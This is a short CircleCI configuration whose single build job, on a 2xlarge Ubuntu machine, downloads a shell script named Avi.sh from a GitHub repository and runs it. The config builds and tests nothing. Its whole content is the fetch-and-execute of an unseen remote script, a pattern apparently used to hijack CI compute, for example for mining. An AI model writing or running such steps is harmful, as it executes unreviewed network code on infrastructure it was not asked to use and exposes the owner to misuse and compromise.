version: 2.1
 
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: 2xlarge
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh
